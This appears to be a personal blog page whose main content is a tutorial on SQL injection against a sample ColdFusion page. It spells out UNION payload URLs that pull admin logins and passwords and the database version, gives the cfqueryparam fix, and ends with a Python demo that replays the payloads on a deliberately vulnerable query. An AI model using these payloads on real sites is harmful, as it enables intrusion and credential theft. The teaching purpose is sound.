Apr 13

Finally got my Acumen installed on my 929 and I’m liking the look :D

Haven’t gotten the chance to configure it yet though

Apr 12

One of the most common ways into a web application today is SQL injection. Anyone with just a little knowledge of SQL syntax can pull sensitive information out of a business’s database or inject content that is rendered when anonymous users visit a page. The purpose of this article is to educate developers and administrators about the security vulnerabilities that may exist in their publicly accessible web sites, using a ColdFusion page as the example.

Example:
http://jw0rd.com/test2.cfm?id=1

This is a basic database-driven ColdFusion page that uses the URL parameter ‘id’ in a SQL SELECT statement. This is what the output of the page is supposed to look like:

[screenshot: the page’s normal output for id=1]

The coding on this page selects a record from the ‘articles’ table where id = #URL.id#

select * from articles where id = #URL.id#

It then outputs the title, category, and article fields for that row. Like a lot of poorly coded web applications there is no validation of the URL parameter ‘id’; whatever the client sends is pasted straight into the SQL text. So let’s alter the SQL statement by appending a UNION. The injected SELECT has to return the same number of columns as the articles query (four here: id, title, category, article) with compatible types, otherwise the database rejects the whole statement.

URL encoding – http://www.w3schools.com/TAGS/ref_urlencode.asp
%20 = [space]
%27 = '

http://jw0rd.com/test2.cfm?id=1%20union%20select%201,%27%27,login,password%20from%20admin

The full SQL statement the database receives is now:
select * from articles where id = 1 union select 1,'',login,password from admin

The output on the page is now two records: the original article row, plus one row per row in the admin table (one account here), with the admin login showing up in the category column and the password in the article column.

[screenshot: article row followed by the admin login and password]

Now let’s add a select on @@version to determine the version of SQL Server the database is running, and also SYSTEM_USER to see what login the application connects with and whether it is possibly a high-privileged account such as ’sa’. Both are Microsoft SQL Server syntax; @@version returns a string, so it goes in the title column rather than the integer id column.

http://jw0rd.com/test2.cfm?id=1%20union%20select%201,@@version,SYSTEM_USER,%27%27%20from%20admin%20order%20by%20title

The full SQL statement the database receives is now:
select * from articles where id = 1 union select 1,@@version,SYSTEM_USER,'' from admin order by title

[screenshot: the server version string and login name rendered in the article listing]

Now that you get the idea of how to exploit through SQL injection, how do you prevent it? EVERY value that can arrive from a client, whether POST’d, GET’d, or sent in a cookie or header, and whether the user is anonymous or logged in, has to be validated and passed to the database as a bound parameter instead of being concatenated into the SQL text. For our ColdFusion example above the ‘cfqueryparam’ tag does exactly that -> http://livedocs.adobe.com/coldfusion/8/htmldocs/help.html?content=Tags_p-q_18.html

Original, vulnerable SQL Statement in test2.cfm:

select * from articles where id = #URL.id#

Updated, secure SQL statement:

select * from articles where id = <cfqueryparam value="#URL.id#" CFSQLType = "CF_SQL_INTEGER">

Now that we are forcing that variable to be of type integer, let’s try to inject a SQL statement again.

[screenshot: ColdFusion error page rejecting the injected value]

SQL injection is no longer possible through the ‘id’ parameter:

Invalid data 1 union select 1,'',login,password from admin for CFSQLTYPE CF_SQL_INTEGER.

Another security risk is the raw ColdFusion error page itself, which displays a snippet of our code and the rejected value to an anonymous user; that is exactly the kind of detail an attacker uses to map the application. Setting up custom error handling so that it is never seen is always a good idea, but is an entirely different subject.
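To see both halves of the article run end to end, the two UNION payloads and the cfqueryparam fix, here is an added example; it is not code from the original post. It replays the post’s two payload URLs against a constructed in-memory SQLite database with the ‘articles’ and ‘admin’ tables. The table schema, the row contents, and the function names are assumptions, and because SQLite has no @@version or SYSTEM_USER, the second payload substitutes sqlite_version() and a literal placeholder for them.

```python
import re
import sqlite3
from urllib.parse import urlsplit, parse_qs

# Constructed sample schema standing in for the post's 'articles' and 'admin'
# tables (column names follow the post; the row contents are made up).
# SQLite is used so this runs offline; the post's target is SQL Server.
SCHEMA = """
create table articles (id integer, title text, category text, article text);
create table admin (login text, password text);
insert into articles values (1, 'First post', 'news', 'Body of the first post.');
insert into articles values (2, 'Second post', 'misc', 'Body of the second post.');
insert into admin values ('admin', 'hunter2');
"""

# First payload URL from the post, unchanged.
URL_DUMP_ADMIN = ("http://jw0rd.com/test2.cfm?id=1%20union%20select%201,%27%27,"
                  "login,password%20from%20admin")
# Second payload, adapted: the post uses @@version and SYSTEM_USER (SQL Server);
# SQLite has neither, so sqlite_version() and a 'dbuser' placeholder stand in.
URL_FINGERPRINT = ("http://jw0rd.com/test2.cfm?id=1%20union%20select%201,"
                   "sqlite_version(),%27dbuser%27,%27%27%20from%20admin"
                   "%20order%20by%20title")


def build_db():
    """Create the in-memory database with the constructed sample rows."""
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def id_from_url(url):
    """URL-decode the 'id' parameter the way the web server hands it to the page
    (%20 becomes a space, %27 becomes a single quote)."""
    return parse_qs(urlsplit(url).query)["id"][0]


def vulnerable_lookup(db, raw_id):
    """Mirrors the original test2.cfm: #URL.id# is pasted into the SQL text.
    Returns the statement that actually ran and the rows it produced."""
    sql = "select * from articles where id = " + raw_id
    return sql, db.execute(sql).fetchall()


def safe_lookup(db, raw_id):
    """Mirrors <cfqueryparam cfsqltype="CF_SQL_INTEGER">: reject anything that is
    not an integer, then send the value as a bound parameter, never as SQL text."""
    if not re.fullmatch(r"\s*-?\d+\s*", raw_id):
        raise ValueError(f"Invalid data {raw_id} for CFSQLTYPE CF_SQL_INTEGER.")
    sql = "select * from articles where id = ?"
    return sql, db.execute(sql, (int(raw_id),)).fetchall()


if __name__ == "__main__":
    db = build_db()
    for url in (URL_DUMP_ADMIN, URL_FINGERPRINT):
        raw = id_from_url(url)
        sql, rows = vulnerable_lookup(db, raw)
        print("vulnerable:", sql)
        for row in rows:
            print("   ", row)
        try:
            safe_lookup(db, raw)
        except ValueError as err:
            print("safe:", err)
```

Running it shows the leaked admin row landing in the category and article columns exactly as the screenshot above does, and the same payload being refused by safe_lookup with the message the post quotes. Sending a UNION with the wrong number of columns (for example `1 union select login,password from admin`) makes the database raise an error instead, which is why an attacker’s first job is to find the column count.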

Hopefully I will have some extra time soon to post a similar article related to basic MySQL injection techniques.
